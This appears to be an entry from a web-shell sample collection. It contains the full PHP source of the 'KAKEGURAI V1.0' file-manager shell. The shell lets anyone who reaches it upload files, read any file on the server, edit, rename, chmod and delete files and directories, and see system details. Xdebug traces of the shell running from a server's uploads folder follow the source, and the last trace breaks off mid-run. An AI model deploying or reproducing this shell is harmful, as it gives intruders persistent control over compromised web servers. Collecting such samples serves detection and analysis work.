Jump to:
Screenshot
Attributes
Environment
<?php
set_time_limit(0);
error_reporting(0);
if (get_magic_quotes_gpc()) {
foreach ($_POST as $key => $value) {
$_POST[$key] = stripslashes($value);
}
}
?>
<!DOCTYPE html>
<html lang="en-US">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>KAKEGURAI V1.0</title>
<link rel="icon" href="https://i.top4top.io/p_1787k1epc0.jpeg" />
<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Berkshire+Swash" type="text/css">
<link rel="stylesheet" href="//0x5a455553.github.io/MARIJUANA/MKY.css" type="text/css">
</head>
<body>
<script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js" type="text/javascript"></script>
<center>
<a href="<?php
$url = basename($_SERVER['PHP_SELF']);
echo $url;
?>"><b><h1><font face="courier new" color="white">Welcome To Kakegurai </font></h1></b><img width="300" height="300" src="https://c.top4top.io/p_1825v49zj0.jpg"><br><br><audio src="https://c.top4top.io/m_1792ih87p0.mp3" type="audio/mpeg" controls="controls" autoplays="autoplays"></a>
</center>
<center><br><marquee><b><h4><font face="courier new" color="white">Thanks For Kakegurai - Mr.Rex - Faidil - Budi - Apip(KangColi) - Udin - Ivan - Haikal - Reza </font></h4></b></marquee></center>
<br>
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr>
<td>
<?php
echo php_uname();
?>
<br>
<?php
if (isset($_GET['path'])) {
$path = $_GET['path'];
} else {
$path = getcwd();
}
$path = str_replace('\\', '/', $path);
$paths = explode('/', $path);
foreach ($paths as $id => $pat) {
if ($pat == '' && $id == 0) {
$a = true;
echo "\n\t\t\t\t\t\t<a class=\"wrn\" href=\"?path=/\">/</a>";
continue;
}
if ($pat == '') {
continue;
}
echo "\t\t\t\t\t\t\t\n\t\t\t\t\t\t<a class=\"wrn\" href=\"?path=";
for ($i = 0; $i <= $id; $i++) {
echo "{$paths[$i]}";
if ($i != $id) {
echo "/";
}
}
echo '">' . $pat . '</a>/';
}
echo "\n\t\t\t\t\t</td>\n\t\t\t\t</tr>\n\n\t\t\t\t<tr>\n\t\t\t\t\t<td>";
if (isset($_FILES['file'])) {
if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
echo "\n\t\t\t\t\t\t<script>alert(\"OK\");</script>\n\t\t\t\t\t\t\n\t\t\t\t\t\t<br>\n\t\t\t\t\t\t";
} else {
echo "\n\t\t\t\t\t\t<script>alert(\"FAIL\");</script>\n\t\t\t\t\t\t\n\t\t\t\t\t\t<br>\n\t\t\t\t\t\t";
}
}
?>
<form enctype="multipart/form-data" method="POST">
<input type="file" name="file" />
<input type="submit" value=">>" />
</form>
</td>
</tr>
<?php
if (isset($_GET['filesrc'])) {
echo "\t\t\t\t<tr>\n\t\t\t\t\t<td>\n\t\t\t\t\t\n\t\t\t\t\t<br>\n\t\t\t\t\t\n\t\t\t\t\t<center>\n\t\t\t\t\t";
echo "<font color=\"#00FF66 \">" . $_GET['filesrc'] . "</font>";
echo "\n\t\t\t\t\t</center>\n\t\t\t\t\t</td>\n\t\t\t\t</tr>\n\t\t\t</table>\n\t\t\t\n\t\t\t<br>";
echo '
<pre>
' . htmlspecialchars(file_get_contents($_GET['filesrc'])) . '
</pre>';
} elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
echo ' </table>
<br>
<center>' . $_POST['path'] . '
<br>
<br>';
if ($_POST['opt'] == 'chmod') {
if (isset($_POST['perm'])) {
if (chmod($_POST['path'], $_POST['perm'])) {
echo "\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"OK\");</script>\n\t\t\t\t\n\t\t\t\t<br>";
} else {
echo "\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"FAIL\");</script>\n\t\t\t\t\n\t\t\t\t<br>";
}
}
?>
<form method="POST">
Permission :
<input name="perm" type="text" size="4" value="<?php
echo substr(sprintf('%o', fileperms($_POST['path'])), -4);
?>" />
<input type="hidden" name="path" value="<?php
echo $_POST['path'];
?>">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value=">>" />
</form>
<?php
} elseif ($_POST['opt'] == 'rename') {
if (isset($_POST['newname'])) {
if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
echo "\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"OK\");</script>\n\t\t\t\t\n\t\t\t\t<br>";
} else {
echo "\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"FAIL\");</script>\n\t\t\t\t\n\t\t\t\t<br>";
}
$_POST['name'] = $_POST['newname'];
}
?>
<form method="POST">
New Name :
<input name="newname" type="text" size="20" value="<?php
echo $_POST['name'];
?>" />
<input type="hidden" name="path" value="<?php
echo $_POST['path'];
?>">
<input type="hidden" name="opt" value="rename">
<input type="submit" value=">>" />
</form>
<?php
} elseif ($_POST['opt'] == 'edit') {
if (isset($_POST['src'])) {
$fp = fopen($_POST['path'], 'w');
if (fwrite($fp, $_POST['src'])) {
echo "\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"OK\");</script>\n\t\t\t\t\n\t\t\t\t<br>";
} else {
echo "\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"FAIL\");</script>\n\t\t\t\t\n\t\t\t\t<br>";
}
fclose($fp);
}
?>
<form method="POST">
<textarea cols=80 rows=20 name="src">
<?php
echo htmlspecialchars(file_get_contents($_POST['path']));
?>
</textarea>
<br>
<input type="hidden" name="path" value="<?php
echo $_POST['path'];
?>">
<input type="hidden" name="opt" value="edit">
<input type="submit" value=">>" />
</form>
<?php
}
echo "\t\t\t\t</center>";
} else {
echo "\t\t\t </table>\n\t\t \n\t\t\t <br>\n\t\t \n\t\t\t <center>";
if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
if ($_POST['type'] == 'dir') {
if (rmdir($_POST['path'])) {
echo "\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"OK\");</script>\n\t\t\t\t\n\t\t\t\t<br>";
} else {
echo "\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"FAIL\");</script>\n\t\t\t\t\n\t\t\t\t<br>";
}
} elseif ($_POST['type'] == 'file') {
if (unlink($_POST['path'])) {
echo "\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"OK\");</script>\n\t\t\t\t\n\t\t\t\t<br>";
} else {
echo "\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"FAIL\");</script>\n\t\t\t\t\n\t\t\t\t<br>";
}
}
}
echo "</center>";
$scandir = scandir($path);
?>
<div id="content">
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr class="first">
<td>
<center>Name</center>
</td>
<td>
<center>Size</center>
</td>
<td>
<center>Permissions</center>
</td>
<td>
<center>Options</center>
</td>
</tr>
<?php
foreach ($scandir as $dir) {
if (!is_dir("{$path}/{$dir}") || $dir == '.' || $dir == '..') {
continue;
}
echo "\t\t\t\t\t\n\t\t\t\t\t<tr>\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<a class=\"wrn\" href=\"?path={$path}/{$dir}\">{$dir}</a>\n\t\t\t\t\t\t</td>\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<center>--</center>\n\t\t\t\t\t\t</td>\t\t\t\t\t\t\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<center>";
if (is_writable("{$path}/{$dir}")) {
echo "<font color=\"#00BB00\">";
} elseif (!is_readable("{$path}/{$dir}")) {
echo "<font color=\"red\">";
}
echo perms("{$path}/{$dir}");
if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) {
echo "</font>";
}
echo "</center>\n\t\t\t\t\t\t</td>\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<center>\n\t\t\t\t\t\t\t\t<form method=\"POST\" action=\"?option&path={$path}\">\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t<select name=\"opt\">\n\t\t\t\t\t\t\t\t\t\t<option value=\"\"></option>\n\t\t\t\t\t\t\t\t\t\t<option value=\"delete\">Delete</option>\n\t\t\t\t\t\t\t\t\t\t<option value=\"chmod\">Chmod</option>\n\t\t\t\t\t\t\t\t\t\t<option value=\"rename\">Rename</option>\n\t\t\t\t\t\t\t\t\t</select>\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t<input type=\"hidden\" name=\"type\" value=\"dir\">\n\t\t\t\t\t\t\t\t\t<input type=\"hidden\" name=\"name\" value=\"{$dir}\">\n\t\t\t\t\t\t\t\t\t<input type=\"hidden\" name=\"path\" value=\"{$path}/{$dir}\">\n\t\t\t\t\t\t\t\t\t<input type=\"submit\" value=\">>\" />\n\t\t\t\t\t\t\t\t</form>\n\t\t\t\t\t\t\t</center>\n\t\t\t\t\t\t</td>\n\t\t\t\t\t</tr>";
}
?>
<tr class="first">
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<?php
foreach ($scandir as $file) {
if (!is_file("{$path}/{$file}")) {
continue;
}
$size = filesize("{$path}/{$file}") / 1024;
$size = round($size, 3);
if ($size >= 1024) {
$size = round($size / 1024, 2) . ' MB';
} else {
$size .= ' KB';
}
echo "\t\t\t\t\t<tr>\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<a class=\"wrn\" href=\"?filesrc={$path}/{$file}&path={$path}\">{$file}</a>\n\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<center>" . $size . "</center>\n\t\t\t\t\t\t</td>\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<center>";
if (is_writable("{$path}/{$file}")) {
echo "\n\t\t\t\t\t\t\t\t<font color=\"#00BB00\">";
} elseif (!is_readable("{$path}/{$file}")) {
echo "\n\t\t\t\t\t\t\t\t<font color=\"red\">";
}
echo perms("{$path}/{$file}");
if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) {
echo "</font>";
}
echo "\n\t\t\t\t\t\t\t</center>\n\t\t\t\t\t\t</td>\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<center>\n\t\t\t\t\t\t\t\t<form method=\"POST\" action=\"?option&path={$path}\">\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t<select name=\"opt\">\n\t\t\t\t\t\t\t\t\t\t<option value=\"\"></option>\n\t\t\t\t\t\t\t\t\t\t<option value=\"delete\">Delete</option>\n\t\t\t\t\t\t\t\t\t\t<option value=\"chmod\">Chmod</option>\n\t\t\t\t\t\t\t\t\t\t<option value=\"rename\">Rename</option>\n\t\t\t\t\t\t\t\t\t\t<option value=\"edit\">Edit</option>\n\t\t\t\t\t\t\t\t\t</select>\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t<input type=\"hidden\" name=\"type\" value=\"file\">\n\t\t\t\t\t\t\t\t\t<input type=\"hidden\" name=\"name\" value=\"{$file}\">\n\t\t\t\t\t\t\t\t\t<input type=\"hidden\" name=\"path\" value=\"{$path}/{$file}\">\n\t\t\t\t\t\t\t\t\t<input type=\"submit\" value=\">>\" />\n\t\t\t\t\t\t\t\t</form>\n\t\t\t\t\t\t\t</center>\n\t\t\t\t\t\t</td>\n\t\t\t\t\t</tr>";
}
echo "\n\t\t\t\t</table>\n\t\t\t</div>";
}
?>
<br>
<center>
<h4><font face="courier new" color="white">YT Channel :<a href="https://www.youtube.com/channel/UCN2GrmWH8QQsMrtQbWKQzbg"><h4><font color="yellow" face="courier new">LExz78 Official</font></h4></a></div>
</center>
</body>
</html>
<?php
function perms($file)
{
$perms = fileperms($file);
if (($perms & 0xc000) == 0xc000) {
$info = 's';
} elseif (($perms & 0xa000) == 0xa000) {
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
$info = 'p';
} else {
$info = 'u';
}
$info .= $perms & 0x100 ? 'r' : '-';
$info .= $perms & 0x80 ? 'w' : '-';
$info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-');
$info .= $perms & 0x20 ? 'r' : '-';
$info .= $perms & 0x10 ? 'w' : '-';
$info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-');
$info .= $perms & 0x4 ? 'r' : '-';
$info .= $perms & 0x2 ? 'w' : '-';
$info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-');
return $info;
}
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:59:42.249702]
1 0 1 0.000157 393528
1 3 0 0.000450 447520 {main} 1 /var/www/html/uploads/Shell1.php 0 0
2 4 0 0.000467 447520 set_time_limit 0 /var/www/html/uploads/Shell1.php 2 1 0
2 4 1 0.000484 447584
2 4 R FALSE
2 5 0 0.000498 447552 error_reporting 0 /var/www/html/uploads/Shell1.php 2 1 0
2 5 1 0.000512 447592
2 5 R 22527
2 6 0 0.000525 447552 get_magic_quotes_gpc 0 /var/www/html/uploads/Shell1.php 2 0
2 6 1 0.000537 447552
2 6 R FALSE
2 7 0 0.000552 447552 basename 0 /var/www/html/uploads/Shell1.php 20 1 '/uploads/Shell1.php'
2 7 1 0.000566 447624
2 7 R 'Shell1.php'
1 A /var/www/html/uploads/Shell1.php 20 $url = 'Shell1.php'
2 8 0 0.000593 447592 php_uname 0 /var/www/html/uploads/Shell1.php 27 0
2 8 1 0.000607 447704
2 8 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2 9 0 0.000627 447592 getcwd 0 /var/www/html/uploads/Shell1.php 31 0
2 9 1 0.000640 447640
2 9 R '/var/www/html/uploads'
1 A /var/www/html/uploads/Shell1.php 31 $path = '/var/www/html/uploads'
2 10 0 0.000665 447640 str_replace 0 /var/www/html/uploads/Shell1.php 31 3 '\\' '/' '/var/www/html/uploads'
2 10 1 0.000680 447736
2 10 R '/var/www/html/uploads'
1 A /var/www/html/uploads/Shell1.php 31 $path = '/var/www/html/uploads'
2 11 0 0.000705 447640 explode 0 /var/www/html/uploads/Shell1.php 31 2 '/' '/var/www/html/uploads'
2 11 1 0.000718 448216
2 11 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/Shell1.php 31 $paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/Shell1.php 31 $id = 0
1 A /var/www/html/uploads/Shell1.php 31 $a = TRUE
1 A /var/www/html/uploads/Shell1.php 31 $id = 1
1 A /var/www/html/uploads/Shell1.php 33 $i = 0
1 A /var/www/html/uploads/Shell1.php 33 $i++
1 A /var/www/html/uploads/Shell1.php 33 $i++
1 A /var/www/html/uploads/Shell1.php 31 $id = 2
1 A /var/www/html/uploads/Shell1.php 33 $i = 0
1 A /var/www/html/uploads/Shell1.php 33 $i++
1 A /var/www/html/uploads/Shell1.php 33 $i++
1 A /var/www/html/uploads/Shell1.php 33 $i++
1 A /var/www/html/uploads/Shell1.php 31 $id = 3
1 A /var/www/html/uploads/Shell1.php 33 $i = 0
1 A /var/www/html/uploads/Shell1.php 33 $i++
1 A /var/www/html/uploads/Shell1.php 33 $i++
1 A /var/www/html/uploads/Shell1.php 33 $i++
1 A /var/www/html/uploads/Shell1.php 33 $i++
1 A /var/www/html/uploads/Shell1.php 31 $id = 4
1 A /var/www/html/uploads/Shell1.php 33 $i = 0
1 A /var/www/html/uploads/Shell1.php 33 $i++
1 A /var/www/html/uploads/Shell1.php 33 $i++
1 A /var/www/html/uploads/Shell1.php 33 $i++
1 A /var/www/html/uploads/Shell1.php 33 $i++
1 A /var/www/html/uploads/Shell1.php 33 $i++
2 12 0 0.000969 448144 scandir 0 /var/www/html/uploads/Shell1.php 160 1 '/var/www/html/uploads'
2 12 1 0.001001 448768
2 12 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'Shell1.php', 4 => 'data', 5 => 'prepend.php']
1 A /var/www/html/uploads/Shell1.php 160 $scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'Shell1.php', 4 => 'data', 5 => 'prepend.php']
2 13 0 0.001040 448784 is_dir 0 /var/www/html/uploads/Shell1.php 181 1 '/var/www/html/uploads/.'
2 13 1 0.001056 448848
2 13 R TRUE
2 14 0 0.001071 448816 is_dir 0 /var/www/html/uploads/Shell1.php 181 1 '/var/www/html/uploads/..'
2 14 1 0.001085 448864
2 14 R TRUE
2 15 0 0.001099 448824 is_dir 0 /var/www/html/uploads/Shell1.php 181 1 '/var/www/html/uploads/.htaccess'
2 15 1 0.001114 448864
2 15 R FALSE
2 16 0 0.001133 448832 is_dir 0 /var/www/html/uploads/Shell1.php 181 1 '/var/www/html/uploads/Shell1.php'
2 16 1 0.001149 448880
2 16 R FALSE
2 17 0 0.001162 448832 is_dir 0 /var/www/html/uploads/Shell1.php 181 1 '/var/www/html/uploads/data'
2 17 1 0.001177 448864
2 17 R TRUE
2 18 0 0.001191 448824 is_writable 0 /var/www/html/uploads/Shell1.php 190 1 '/var/www/html/uploads/data'
2 18 1 0.001209 448864
2 18 R TRUE
2 19 0 0.001229 448824 perms 1 /var/www/html/uploads/Shell1.php 190 1 '/var/www/html/uploads/data'
3 20 0 0.001243 448824 fileperms 0 /var/www/html/uploads/Shell1.php 265 1 '/var/www/html/uploads/data'
3 20 1 0.001256 448864
3 20 R 16895
2 A /var/www/html/uploads/Shell1.php 265 $perms = 16895
2 A /var/www/html/uploads/Shell1.php 265 $info = 'd'
2 A /var/www/html/uploads/Shell1.php 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.php 265 $info .= 'w'
2 A /var/www/html/uploads/Shell1.php 265 $info .= 'x'
2 A /var/www/html/uploads/Shell1.php 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.php 265 $info .= 'w'
2 A /var/www/html/uploads/Shell1.php 265 $info .= 'x'
2 A /var/www/html/uploads/Shell1.php 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.php 265 $info .= 'w'
2 A /var/www/html/uploads/Shell1.php 265 $info .= 'x'
2 19 1 0.001386 448864
2 19 R 'drwxrwxrwx'
2 21 0 0.001401 448824 is_writable 0 /var/www/html/uploads/Shell1.php 190 1 '/var/www/html/uploads/data'
2 21 1 0.001417 448864
2 21 R TRUE
2 22 0 0.001431 448832 is_dir 0 /var/www/html/uploads/Shell1.php 181 1 '/var/www/html/uploads/prepend.php'
2 22 1 0.001446 448880
2 22 R FALSE
2 23 0 0.001459 448824 is_file 0 /var/www/html/uploads/Shell1.php 219 1 '/var/www/html/uploads/.'
2 23 1 0.001473 448848
2 23 R FALSE
2 24 0 0.001486 448816 is_file 0 /var/www/html/uploads/Shell1.php 219 1 '/var/www/html/uploads/..'
2 24 1 0.001500 448864
2 24 R FALSE
2 25 0 0.001513 448824 is_file 0 /var/www/html/uploads/Shell1.php 219 1 '/var/www/html/uploads/.htaccess'
2 25 1 0.001527 448864
2 25 R TRUE
2 26 0 0.001540 448824 filesize 0 /var/www/html/uploads/Shell1.php 219 1 '/var/www/html/uploads/.htaccess'
2 26 1 0.001553 448864
2 26 R 64
1 A /var/www/html/uploads/Shell1.php 219 $size = 0.0625
2 27 0 0.001576 448768 round 0 /var/www/html/uploads/Shell1.php 219 2 0.0625 3
2 27 1 0.001591 448840
2 27 R 0.063
1 A /var/www/html/uploads/Shell1.php 219 $size = 0.063
1 A /var/www/html/uploads/Shell1.php 219 $size = '0.063 KB'
2 28 0 0.001627 448864 is_writable 0 /var/www/html/uploads/Shell1.php 228 1 '/var/www/html/uploads/.htaccess'
2 28 1 0.001642 448904
2 28 R FALSE
2 29 0 0.001655 448864 is_readable 0 /var/www/html/uploads/Shell1.php 229 1 '/var/www/html/uploads/.htaccess'
2 29 1 0.001670 448904
2 29 R TRUE
2 30 0 0.001684 448864 perms 1 /var/www/html/uploads/Shell1.php 230 1 '/var/www/html/uploads/.htaccess'
3 31 0 0.001696 448864 fileperms 0 /var/www/html/uploads/Shell1.php 265 1 '/var/www/html/uploads/.htaccess'
3 31 1 0.001709 448904
3 31 R 33188
2 A /var/www/html/uploads/Shell1.php 265 $perms = 33188
2 A /var/www/html/uploads/Shell1.php 265 $info = '-'
2 A /var/www/html/uploads/Shell1.php 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.php 265 $info .= 'w'
2 A /var/www/html/uploads/Shell1.php 265 $info .= '-'
2 A /var/www/html/uploads/Shell1.php 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.php 265 $info .= '-'
2 A /var/www/html/uploads/Shell1.php 265 $info .= '-'
2 A /var/www/html/uploads/Shell1.php 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.php 265 $info .= '-'
2 A /var/www/html/uploads/Shell1.php 265 $info .= '-'
2 30 1 0.001822 448904
2 30 R '-rw-r--r--'
2 32 0 0.001836 448864 is_writable 0 /var/www/html/uploads/Shell1.php 230 1 '/var/www/html/uploads/.htaccess'
2 32 1 0.001851 448904
2 32 R FALSE
2 33 0 0.001864 448864 is_readable 0 /var/www/html/uploads/Shell1.php 230 1 '/var/www/html/uploads/.htaccess'
2 33 1 0.001879 448904
2 33 R TRUE
2 34 0 0.001897 448984 is_file 0 /var/www/html/uploads/Shell1.php 219 1 '/var/www/html/uploads/Shell1.php'
2 34 1 0.001912 449032
2 34 R TRUE
2 35 0 0.001924 448992 filesize 0 /var/www/html/uploads/Shell1.php 219 1 '/var/www/html/uploads/Shell1.php'
2 35 1 0.001936 449032
2 35 R 9316
1 A /var/www/html/uploads/Shell1.php 219 $size = 9.09765625
2 36 0 0.001959 448888 round 0 /var/www/html/uploads/Shell1.php 219 2 9.09765625 3
2 36 1 0.001972 448960
2 36 R 9.098
1 A /var/www/html/uploads/Shell1.php 219 $size = 9.098
1 A /var/www/html/uploads/Shell1.php 219 $size = '9.098 KB'
2 37 0 0.002013 448992 is_writable 0 /var/www/html/uploads/Shell1.php 228 1 '/var/www/html/uploads/Shell1.php'
2 37 1 0.002029 449032
2 37 R FALSE
2 38 0 0.002042 448992 is_readable 0 /var/www/html/uploads/Shell1.php 229 1 '/var/www/html/uploads/Shell1.php'
2 38 1 0.002056 449032
2 38 R TRUE
2 39 0 0.002069 448992 perms 1 /var/www/html/uploads/Shell1.php 230 1 '/var/www/html/uploads/Shell1.php'
3 40 0 0.002081 448992 fileperms 0 /var/www/html/uploads/Shell1.php 265 1 '/var/www/html/uploads/Shell1.php'
3 40 1 0.002093 449032
3 40 R 33204
2 A /var/www/html/uploads/Shell1.php 265 $perms = 33204
2 A /var/www/html/uploads/Shell1.php 265 $info = '-'
2 A /var/www/html/uploads/Shell1.php 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.php 265 $info .= 'w'
2 A /var/www/html/uploads/Shell1.php 265 $info .= '-'
2 A /var/www/html/uploads/Shell1.php 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.php 265 $info .= 'w'
2 A /var/www/html/uploads/Shell1.php 265 $info .= '-'
2 A /var/www/html/uploads/Shell1.php 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.php 265 $info .= '-'
2 A /var/www/html/uploads/Shell1.php 265 $info .= '-'
2 39 1 0.002286 449032
2 39 R '-rw-rw-r--'
2 41 0 0.002300 448992 is_writable 0 /var/www/html/uploads/Shell1.php 230 1 '/var/www/html/uploads/Shell1.php'
2 41 1 0.002316 449032
2 41 R FALSE
2 42 0 0.002330 448992 is_readable 0 /var/www/html/uploads/Shell1.php 230 1 '/var/www/html/uploads/Shell1.php'
2 42 1 0.002344 449032
2 42 R TRUE
2 43 0 0.002357 448984 is_file 0 /var/www/html/uploads/Shell1.php 219 1 '/var/www/html/uploads/data'
2 43 1 0.002372 449016
2 43 R FALSE
2 44 0 0.002385 448984 is_file 0 /var/www/html/uploads/Shell1.php 219 1 '/var/www/html/uploads/prepend.php'
2 44 1 0.002400 449032
2 44 R TRUE
2 45 0 0.002413 448992 filesize 0 /var/www/html/uploads/Shell1.php 219 1 '/var/www/html/uploads/prepend.php'
2 45 1 0.002426 449032
2 45 R 57
1 A /var/www/html/uploads/Shell1.php 219 $size = 0.0556640625
2 46 0 0.002449 448888 round 0 /var/www/html/uploads/Shell1.php 219 2 0.0556640625 3
2 46 1 0.002462 448960
2 46 R 0.056
1 A /var/www/html/uploads/Shell1.php 219 $size = 0.056
1 A /var/www/html/uploads/Shell1.php 219 $size = '0.056 KB'
2 47 0 0.002498 448992 is_writable 0 /var/www/html/uploads/Shell1.php 228 1 '/var/www/html/uploads/prepend.php'
2 47 1 0.002513 449032
2 47 R FALSE
2 48 0 0.002526 448992 is_readable 0 /var/www/html/uploads/Shell1.php 229 1 '/var/www/html/uploads/prepend.php'
2 48 1 0.002541 449032
2 48 R TRUE
2 49 0 0.002554 448992 perms 1 /var/www/html/uploads/Shell1.php 230 1 '/var/www/html/uploads/prepend.php'
3 50 0 0.002566 448992 fileperms 0 /var/www/html/uploads/Shell1.php 265 1 '/var/www/html/uploads/prepend.php'
3 50 1 0.002579 449032
3 50 R 33261
2 A /var/www/html/uploads/Shell1.php 265 $perms = 33261
2 A /var/www/html/uploads/Shell1.php 265 $info = '-'
2 A /var/www/html/uploads/Shell1.php 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.php 265 $info .= 'w'
2 A /var/www/html/uploads/Shell1.php 265 $info .= 'x'
2 A /var/www/html/uploads/Shell1.php 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.php 265 $info .= '-'
2 A /var/www/html/uploads/Shell1.php 265 $info .= 'x'
2 A /var/www/html/uploads/Shell1.php 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.php 265 $info .= '-'
2 A /var/www/html/uploads/Shell1.php 265 $info .= 'x'
2 49 1 0.002693 449032
2 49 R '-rwxr-xr-x'
2 51 0 0.002707 448992 is_writable 0 /var/www/html/uploads/Shell1.php 230 1 '/var/www/html/uploads/prepend.php'
2 51 1 0.002722 449032
2 51 R FALSE
2 52 0 0.002735 448992 is_readable 0 /var/www/html/uploads/Shell1.php 230 1 '/var/www/html/uploads/prepend.php'
2 52 1 0.002750 449032
2 52 R TRUE
1 3 1 0.002765 448928
0.002794 326280
TRACE END [2023-02-12 20:59:42.252369]
data/traces/119a2765baff7b5ef0ac567e74dfcc28_trace-1676247360.9019.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:16:26.799799]
1 0 1 0.000207 393528
1 3 0 0.000498 447520 {main} 1 /var/www/html/uploads/Shell1.phtml 0 0
2 4 0 0.000515 447520 set_time_limit 0 /var/www/html/uploads/Shell1.phtml 2 1 0
2 4 1 0.000532 447584
2 4 R FALSE
2 5 0 0.000557 447552 error_reporting 0 /var/www/html/uploads/Shell1.phtml 2 1 0
2 5 1 0.000573 447592
2 5 R 22527
2 6 0 0.000587 447552 get_magic_quotes_gpc 0 /var/www/html/uploads/Shell1.phtml 2 0
2 6 1 0.000600 447552
2 6 R FALSE
2 7 0 0.000615 447552 basename 0 /var/www/html/uploads/Shell1.phtml 20 1 '/uploads/Shell1.phtml'
2 7 1 0.000630 447624
2 7 R 'Shell1.phtml'
1 A /var/www/html/uploads/Shell1.phtml 20 $url = 'Shell1.phtml'
2 8 0 0.000658 447592 php_uname 0 /var/www/html/uploads/Shell1.phtml 27 0
2 8 1 0.000671 447704
2 8 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2 9 0 0.000691 447592 getcwd 0 /var/www/html/uploads/Shell1.phtml 31 0
2 9 1 0.000704 447640
2 9 R '/var/www/html/uploads'
1 A /var/www/html/uploads/Shell1.phtml 31 $path = '/var/www/html/uploads'
2 10 0 0.000729 447640 str_replace 0 /var/www/html/uploads/Shell1.phtml 31 3 '\\' '/' '/var/www/html/uploads'
2 10 1 0.000744 447736
2 10 R '/var/www/html/uploads'
1 A /var/www/html/uploads/Shell1.phtml 31 $path = '/var/www/html/uploads'
2 11 0 0.000768 447640 explode 0 /var/www/html/uploads/Shell1.phtml 31 2 '/' '/var/www/html/uploads'
2 11 1 0.000782 448216
2 11 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/Shell1.phtml 31 $paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/Shell1.phtml 31 $id = 0
1 A /var/www/html/uploads/Shell1.phtml 31 $a = TRUE
1 A /var/www/html/uploads/Shell1.phtml 31 $id = 1
1 A /var/www/html/uploads/Shell1.phtml 33 $i = 0
1 A /var/www/html/uploads/Shell1.phtml 33 $i++
1 A /var/www/html/uploads/Shell1.phtml 33 $i++
1 A /var/www/html/uploads/Shell1.phtml 31 $id = 2
1 A /var/www/html/uploads/Shell1.phtml 33 $i = 0
1 A /var/www/html/uploads/Shell1.phtml 33 $i++
1 A /var/www/html/uploads/Shell1.phtml 33 $i++
1 A /var/www/html/uploads/Shell1.phtml 33 $i++
1 A /var/www/html/uploads/Shell1.phtml 31 $id = 3
1 A /var/www/html/uploads/Shell1.phtml 33 $i = 0
1 A /var/www/html/uploads/Shell1.phtml 33 $i++
1 A /var/www/html/uploads/Shell1.phtml 33 $i++
1 A /var/www/html/uploads/Shell1.phtml 33 $i++
1 A /var/www/html/uploads/Shell1.phtml 33 $i++
1 A /var/www/html/uploads/Shell1.phtml 31 $id = 4
